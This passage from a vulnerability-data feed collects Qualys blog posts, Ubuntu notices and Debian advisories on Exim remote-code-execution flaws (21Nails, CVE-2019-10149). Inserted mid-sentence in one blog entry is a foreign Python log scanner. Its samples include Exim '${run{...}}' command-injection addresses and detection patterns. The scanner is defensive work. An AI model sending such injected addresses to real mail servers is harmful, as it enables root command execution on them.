"2021-06-14T06:32:34", "description": "**Update May 7, 2021**: Exim has released a security update to address multiple vulnerabilities in Exim versions prior to 
4.94.2. See the [CISA announcement](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/exim-releases-security-update>).\n\n**Original Post**: The Qualys Research Team has discovered multiple critical vulnerabilities in the Exim mail server, some of which can be chained together to obtain full remote unauthenticated code execution and gain root privileges. Qualys recommends that security teams apply patches for these vulnerabilities as soon as possible.\n\n### About Exim\n\n[Exim](<https://www.exim.org/>) is a popular mail transfer agent (MTA) available for major Unix-like operating systems and comes pre-installed on Linux distributions such as Debian. According to a recent survey, an estimated 60% of the publicly reachable mail servers on the internet run Exim. A [Shodan search](<https://www.shodan.io/>) reveals nearly 4 million Exim servers exposed to the internet.\n\nMail Transfer Agents are interesting targets for attackers because they are usually accessible over the internet. Once an MTA is exploited, adversaries can modify sensitive email settings on the mail server and create new accounts on it. Last year, an Exim vulnerability (CVE-2019-10149) was exploited by the Russian cyber actors known as the Sandworm team.\n\n### Exim Vulnerabilities\n\nLast fall, the Qualys Research Team engaged in a thorough code audit of Exim and discovered 21 unique vulnerabilities. Ten of these vulnerabilities can be exploited remotely, and some of them yield root privileges on the remote system. The other eleven can be exploited locally, and most of them are exploitable in either the default configuration or a very common configuration. Some of the vulnerabilities can be chained together to obtain full remote unauthenticated code execution and gain root privileges on the Exim server. Most of the vulnerabilities discovered by the Qualys Research Team affect all versions of Exim going back to 2004; 
CVE-2020-28017, for example, affects every version back to the beginning of Exim's Git history 17 years ago.\n\n### Vulnerability Summary\n\nCVE| Description| Type \n---|---|--- \nCVE-2020-28007| Link attack in Exim's log directory| Local \nCVE-2020-28008| Assorted attacks in Exim's spool directory| Local \nCVE-2020-28014| Arbitrary file creation and clobbering| Local \nCVE-2021-27216| Arbitrary file deletion| Local \nCVE-2020-28011| Heap buffer overflow in queue_run()| Local \nCVE-2020-28010| Heap out-of-bounds write in main()| Local \nCVE-2020-28013| Heap buffer overflow in parse_fix_phrase()| Local \nCVE-2020-28016| Heap out-of-bounds write in parse_fix_phrase()| Local \nCVE-2020-28015| New-line injection into spool header file (local)| Local \nCVE-2020-28012| Missing close-on-exec flag for privileged pipe| Local \nCVE-2020-28009| Integer overflow in get_stdinput()| Local \nCVE-2020-28017| Integer overflow in receive_add_recipient()| Remote \nCVE-2020-28020| Integer overflow in receive_msg()| Remote \nCVE-2020-28023| Out-of-bounds read in smtp_setup_msg()| Remote \nCVE-2020-28021| New-line injection into spool header file (remote)| Remote \nCVE-2020-28022| Heap out-of-bounds read and write in extract_option()| Remote \nCVE-2020-28026| Line truncation and injection in spool_read_header()| Remote \nCVE-2020-28019| Failure to reset function pointer after BDAT error| Remote \nCVE-2020-28024| Heap buffer underflow in smtp_ungetc()| Remote \nCVE-2020-28018| Use-after-free in tls-openssl.c| Remote \nCVE-2020-28025| Heap out-of-bounds read in pdkim_finish_bodyhash()| Remote \n \nSuccessful exploitation of these vulnerabilities would allow a remote attacker to gain full root privileges on the target server and execute commands to install programs, modify data, and create new accounts. 
Qualys security researchers independently verified these vulnerabilities and developed exploits to obtain full root privileges.\n\nAs soon as the Qualys Research Team confirmed the vulnerabilities, Qualys engaged in responsible vulnerability disclosure and coordinated with Exim developers and open-source distributions to announce the vulnerabilities (see the Disclosure Timeline below).\n\n### Technical Details\n\nThe technical details of all 21 vulnerabilities can be found on [Qualys Security Advisories](<https://www.qualys.com/research/security-advisories/>) or at: <https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n### Qualys Coverage\n\nGiven the breadth of the attack surface, Qualys recommends that users apply patches for these vulnerabilities immediately. Qualys customers can search the vulnerability knowledgebase for “21Nails” to identify all the QIDs and the assets exposed to these vulnerabilities.\n\nQualys is releasing the QIDs in the table below as they become available, starting with vulnsigs version VULNSIGS-2.5.174-2 and Linux [Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version lx_manifest-2.5.174.2-1.\n\nQID| Title| VulnSigs Version \n---|---|--- \n50110| Exim Mail Server Multiple Vulnerabilities (21Nails)| VULNSIGS-2_5_174-2 / lx_manifest-2.5.174.2-1 \n178576| Debian Security Update for exim4 (DSA 4912-1) (21Nails)| VULNSIGS-2_5_177-2 / lx_manifest-2.5.177.2-1 \n198350| Ubuntu Security Notification for Exim4 Vulnerabilities (USN-4934-1) (21Nails)| VULNSIGS-2_5_177-2 / lx_manifest-2.5.177.2-1 \n \n### Discover Vulnerable Exim Servers Using Qualys VMDR\n\n#### Identify Assets Running Exim\n\nThe first step in managing these critical vulnerabilities and reducing risk is to identify the assets running Exim software. 
[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify such assets.\n\nQuery: `software:(name:\"Exim\")`\n\nOnce the hosts are identified, they can be grouped together with a ‘dynamic tag’, say, “Exim Assets”. This automatically groups the existing hosts with the above vulnerabilities as well as any new Exim-based assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Prioritize Based on RTIs\n\nUsing VMDR, the Exim vulnerabilities can be prioritized using the following real-time threat indicators (RTIs):\n\n * Predicted_High_Risk\n * Wormable\n * Remote_Code_Execution\n * Privilege_Escalation\n * Unauthenticated_Exploitation\n * High_Lateral_Movement\n\n#### Detect Impacted Assets with Threat Protection\n\nVMDR also enables you to automatically map the assets exposed to these vulnerabilities using [Threat Protection](<https://www.qualys.com/apps/threat-protection/>).\n\n### Dashboard\n\nWith the VMDR Dashboard, you can track these vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of the trends for these vulnerabilities in your environment using the “21Nails” Dashboard.\n\nView and download the [“21Nails” dashboard here](<https://qualys-secure.force.com/customer/s/article/000006647>).\n\n### Free 30-Day VMDR Service\n\nTo help security teams assess and mitigate their risk exposure to the Exim vulnerabilities (21Nails), Qualys is offering an [integrated VMDR service](<https://www.qualys.com/forms/exim-vulnerabilities/>) free for 30 days to identify vulnerable assets.\n\n### Disclosure Timeline\n\n**2020-10-20**: The Qualys Research Team (QRT) informed Exim (security@exim) about the new vulnerabilities. \n**2020-10-28**: QRT shared the first draft of the advisory. The vendor immediately acknowledged it and started to work on patches. \n**2020-10-29**: QRT sent a list of 10 secondary issues to Exim. \n**2020-10-30**: QRT requested 20 CVEs from Mitre. They were assigned on the same day and immediately transmitted to Exim. \n**2020-11-13**: Exim gave QRT read access to their private Git repository to review patches. We started reviewing the first set of patches (which tackled 7 CVEs). \n**2020-11-17 and 2020-11-18**: QRT sent a two-part patch review to Exim, since several patches were incomplete. \n**2020-12-02**: A second set of patches (which tackled 7 secondary issues) appeared in Exim's private Git repository. We started reviewing it. \n**2020-12-09**: We sent our second patch review to Exim. \n**2021-01-28**: We mailed Exim and offered to work on the incomplete and missing patches. \n**2021-02-05**: Exim acknowledged our mail. We started to write a minimal but complete set of patches (on top of exim-4.94+fixes). \n**2021-02-15**: While working on a patch for CVE-2020-28014, we discovered CVE-2021-27216. We requested a CVE from Mitre and immediately sent a heads-up to Exim. \n**2021-02-24**: We completed our minimal set of patches and sent it to Exim. 
\n**2021-04-17**: Exim proposed 2021-05-04 for the Coordinated Release Date. \n**2021-04-19**: We accepted the proposed Coordinated Release Date. \n**2021-04-21**: Exim publicly announced the impending security release. \n**2021-04-27**: Exim provided packagers and maintainers with access to its security Git repository. \n**2021-05-04**: Coordinated Release Date.\n\nAs the disclosure timeline shows, it was a long process from the time the vulnerabilities were first discovered and reported to the point when patches were available. All in all, the Qualys Research Team reported these vulnerabilities and provided 26 patches, a testament to our commitment to responsible disclosure.\n\n### Vendor References\n\n<https://www.openwall.com/lists/oss-security/2021/05/04/6>\n\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n<https://www.exim.org/static/doc/security/CVE-2020-qualys/>\n\n### Frequently Asked Questions (FAQs)\n\n###### What versions are vulnerable?\n\nAll versions before Exim 4.94.2 are vulnerable.\n\n###### Why the name “21Nails”?\n\nIt’s a pun on 21 vulnerabilities in a “Mail” transfer agent, 
with each nail representing one vulnerability.\n\n###### Will the Qualys Research Team publish exploit code for these vulnerabilities?\n\nNo.", "cvss3": {}, "published": "2021-05-04T14:10:41", "type": "qualysblog", "title": "21Nails: Multiple Critical Vulnerabilities in Exim Mail Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T14:10:41", "id": "QUALYSBLOG:4670C5BC6972C137122A7C820F9793F0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-15T00:29:31", "description": "Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. This vulnerability can lead to remote command injection and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all Exim versions from 4.87 to 4.91. Exploitation only requires a malicious email to be sent to a vulnerable server, and the injected commands will typically run as root. There are multiple ways that Exim can be configured; some of these allow for faster exploitation, while others may require a week to fully exploit. 
For technical details on this vulnerability, please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is through the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed, as seen here:\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. To filter out the Potential detections (though these should still be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92 or later. 
Check your Linux OS vendor for updated packages.", "cvss3": {}, "published": "2019-06-14T22:27:14", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard – CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (a Russian hacker group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify the assets in your environment that are impacted by this vulnerability: [Exim MTA Vulnerability (The Return of the WIZard – CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nThe Exim MTA vulnerability can be exploited by sending a malicious email to the server, allowing an attacker to run code on the server remotely. This vulnerability can lead to remote command injection and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nThe NSA noted that Sandworm actors have been exploiting this vulnerability since at least August 2019. 
The actors exploited victims running Exim on their public-facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. Sandworm then executed a shell script to perform the following actions on the victim's system:\n\n * Add privileged users\n * Disable network security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nUnpatched systems are at high risk, and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. You can search for these QIDs in the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability, as Qualys QID 50092 carries the following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With the 'live feed' updated for all emerging high- and medium-risk threats, you can clearly see the impacted hosts for each threat.\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. 
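Version checks tell you which hosts could have been hit; the other question an incident responder has is whether the injection vector was actually sent. As an added example (not code from Qualys, the NSA or the Exim project), here is a scanner for that. CVE-2019-10149 fires when Exim string-expands a crafted envelope address; the expansion item the linked Qualys advisory describes is `${run{...}}` in the recipient, and the NSA advisory summarized above places the command in MAIL FROM instead. The scanner therefore flags any `${item` inside a sender or recipient address, in Exim mainlog `<=` lines and in raw SMTP dialogue alike. Assumptions: the `<=` line layout (sender, then `H=`/`U=`/`P=` fields, then `for <recipients>`, which Exim writes only when the `received_recipients` log selector is enabled) and the sample lines, which are constructed for this example.

```python
"""Flag Exim string-expansion items inside envelope addresses.

Added example, not code from Qualys, the NSA or the Exim project. Looks for "${item"
in sender/recipient addresses, both in Exim mainlog "<=" lines and in raw SMTP
commands. Assumed: the "<=" line layout (sender, then H=/U=/P=/R=/S=/F= fields, then
"for <recipients>" when the received_recipients log selector is on). All lines in
SAMPLE are constructed for this example.
"""
import re
from dataclasses import dataclass

EXPANSION = re.compile(r"\$\{\s*([A-Za-z_]+)")                     # "${run{" -> "run"
MAINLOG_SENDER = re.compile(r" <= (?P<sender>.+?) (?=[HUPRSF]=)")  # address before the first X= field
MAINLOG_RCPTS = re.compile(r" for (?P<rcpts>.+)$")                  # received_recipients suffix
SMTP_ENVELOPE = re.compile(r"\b(?P<verb>MAIL FROM|RCPT TO):\s*<(?P<addr>.*)>", re.IGNORECASE)


@dataclass
class Finding:
    lineno: int
    field: str     # "sender" or "recipient"
    address: str   # the envelope address as logged or as sent on the wire
    item: str      # expansion item name found in it, e.g. "run"


def _items(lineno: int, field: str, address: str) -> list:
    return [Finding(lineno, field, address, m.group(1)) for m in EXPANSION.finditer(address)]


def scan_line(lineno: int, line: str) -> list:
    """Findings for one mainlog line or one SMTP command line."""
    m = SMTP_ENVELOPE.search(line)
    if m:
        field = "sender" if m["verb"].upper() == "MAIL FROM" else "recipient"
        return _items(lineno, field, m["addr"])
    if " <= " not in line:        # only message-arrival lines carry envelope addresses
        return []
    found = []
    m = MAINLOG_SENDER.search(line)
    if m:
        found += _items(lineno, "sender", m["sender"])
    m = MAINLOG_RCPTS.search(line)
    if m:
        found += _items(lineno, "recipient", m["rcpts"])
    return found


def scan(lines) -> list:
    """Scan an iterable of lines (a mainlog, or a reconstructed SMTP session)."""
    findings = []
    for n, line in enumerate(lines, 1):
        findings.extend(scan_line(n, line.rstrip("\n")))
    return findings


# Constructed sample: two benign lines, three injected envelope addresses.
SAMPLE = [
    "2020-05-28 10:14:55 1jeAaa-0001aB-Cd <= alice@example.test H=mx1.example.test [198.51.100.7] P=esmtps S=2048 for bob@example.test",
    "2020-05-28 10:15:02 1jeAab-0001aC-De <= attacker@example.invalid H=(x) [192.0.2.10] P=esmtp S=512 for ${run{/bin/sh -c 'id'}}@localhost",
    "2020-05-28 10:15:09 1jeAac-0001aD-Ef <= ${run{/usr/bin/id}}@example.invalid H=(y) [192.0.2.11] P=esmtp S=480 for postmaster@example.test",
    "MAIL FROM:<${run{/usr/bin/id}}@example.invalid>",
    "RCPT TO:<bob@example.test>",
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"line {f.lineno}: ${{{f.item}...}} in {f.field} address {f.address!r}")
```

Matching on the `${item` prefix rather than on the command body is deliberate: the body can be written with Exim's backslash escapes (`\x2f` for `/`, for instance), but the item name has to appear literally for the expansion to happen. A clean mainlog is not proof of absence, since the recipient only reaches the `<=` line when `received_recipients` is logged; the rejectlog and a packet capture of port 25 are the more reliable sources for the MAIL FROM and RCPT TO values themselves.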
System administrators can update the package through their Linux distribution's package manager, or download the latest version from <https://www.exim.org/mirrors.html>.\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "cvss3": {}, "published": "2020-05-29T22:42:14", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-07-23T09:35:32", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n * Ubuntu 18.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim contained multiple security issues. 
An attacker \ncould use these issues to cause a denial of service, execute arbitrary \ncode remotely, obtain sensitive information, or escalate local privileges.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "USN-4934-1", "href": "https://ubuntu.com/security/notices/USN-4934-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:36:55", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nUSN-4934-1 fixed several vulnerabilities in Exim. 
This update provides \nthe corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. \nCVE-2020-28026 only affected Ubuntu 16.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Exim contained multiple security issues. An attacker \ncould use these issues to cause a denial of service, execute arbitrary \ncode remotely, obtain sensitive information, or escalate local privileges.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T00:00:00", "type": "ubuntu", "title": "Exim vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28020", "CVE-2020-28022", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-06T00:00:00", "id": "USN-4934-2", "href": "https://ubuntu.com/security/notices/USN-4934-2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-25T00:20:12", "description": "## Releases\n\n * Ubuntu 
18.10 \n * Ubuntu 18.04 ESM\n\n## Packages\n\n * exim4 \\- Exim is a mail transport agent\n\nIt was discovered that Exim incorrectly handled certain decoding \noperations. A remote attacker could possibly use this issue to execute \narbitrary commands.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "ubuntu", "title": "Exim vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-05T00:00:00", "id": "USN-4010-1", "href": "https://ubuntu.com/security/notices/USN-4010-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:15:27", "description": "\nThe Qualys Research Labs reported several vulnerabilities in Exim, a mail\ntransport agent, which could result in local privilege escalation and\nremote code execution.\n\n\nDetails can be found in the Qualys advisory at\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the 
detailed security status of exim4 please refer to its security\ntracker page at: <https://security-tracker.debian.org/tracker/exim4>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019", "CVE-2020-28026", "CVE-2020-28023", "CVE-2020-28017", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28013", "CVE-2020-28009", "CVE-2020-28020", "CVE-2020-28015", "CVE-2020-28025", "CVE-2020-28012", "CVE-2020-28014", "CVE-2020-28022", "CVE-2020-28011", "CVE-2020-28024", "CVE-2020-28021"], "modified": "2022-07-21T05:53:43", "id": "OSV:DLA-2650-1", "href": "https://osv.dev/vulnerability/DLA-2650-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:07:11", "description": "\nThe Qualys Research Labs reported several vulnerabilities in Exim, a\nmail 
transport agent, which could result in local privilege escalation\nand remote code execution.\n\n\nDetails can be found in the Qualys advisory at\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.92-8+deb10u6.\n\n\nWe recommend that you upgrade your exim4 packages.\n\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/exim4>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "osv", "title": "exim4 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019", "CVE-2020-28026", "CVE-2020-28023", "CVE-2020-28017", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28013", "CVE-2020-28009", "CVE-2020-28015", "CVE-2020-28025", "CVE-2020-28010", "CVE-2020-28012", "CVE-2020-28014", "CVE-2020-28022", "CVE-2020-28011", "CVE-2020-28024", "CVE-2020-28021"], "modified": "2022-08-10T07:07:07", "id": "OSV:DSA-4912-1", "href": "https://osv.dev/vulnerability/DSA-4912-1", "cvss": 
